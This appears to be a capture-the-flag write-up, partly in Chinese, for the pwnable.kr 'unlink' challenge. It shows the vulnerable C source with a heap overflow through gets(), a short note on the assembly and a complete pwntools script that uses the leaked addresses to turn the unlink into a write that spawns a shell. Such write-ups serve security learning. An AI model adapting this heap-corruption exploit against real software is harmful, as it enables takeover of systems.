unlink

Daddy! how can I exploit unlink corruption?

ssh unlink@pwnable.kr -p2222 (pw: guest)

 

源码如下：

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
typedef struct tagOBJ{
        struct tagOBJ* fd;
        struct tagOBJ* bk;
        char buf[8];
}OBJ;

void shell(){
        system("/bin/sh");
}

void unlink(OBJ* P){
        OBJ* BK;
        OBJ* FD;
        BK=P->bk;
        FD=P->fd;
        FD->bk=BK;
        BK->fd=FD;
}
int main(int argc, char* argv[]){
        malloc(1024);
        OBJ* A = (OBJ*)malloc(sizeof(OBJ));
        OBJ* B = (OBJ*)malloc(sizeof(OBJ));
        OBJ* C = (OBJ*)malloc(sizeof(OBJ));

        // double linked list: A <-> B <-> C
        A->fd = B;
        B->bk = A;
        B->fd = C;
        C->bk = B;

        printf("here is stack address leak: %p\n", &A);
        printf("here is heap address leak: %p\n", A);
        printf("now that you have leaks, get shell!\n");
        // heap overflow!
        gets(A->buf);

        // exploit this unlink!
        unlink(B);
        return 0;
}

观察汇编发现

 

 最后的return返回的地址是[ecx-4]，而ecx是有[ebp-4]得到，因此只要覆盖ebp-4为一个含有shell函数地址的地址+4即可

exp如下：

from pwn import *

#context.log_level = 'debug'

#io = process('./unlink')
#io = gdb.debug('./unlink', 'b *0x80485E9')
p = ssh(host = 'pwnable.kr', user = 'unlink', password = 'guest', port = 2222)
io = p.process('./unlink')
shell_addr = 0x80484EB

io.recvuntil('here is stack address leak: ')
stack_addr = int(io.recvuntil('\n', drop = True), 16)
info('stack_addr: ' + hex(stack_addr))
goal_addr = stack_addr + 0x10
info('goal_addr: ' + hex(goal_addr))

io.recvuntil('here is heap address leak: ')
heap_addr = int(io.recvuntil('\n', drop = True), 16)
info('heap_addr: ' + hex(heap_addr))

payload = p32(shell_addr) + p32(0) + p32(0) + p32(0x19) + p32(heap_addr + 12) + p32(goal_addr)
io.recvuntil('now that you have leaks, get shell!\n')
io.sendline(payload)

io.interactive()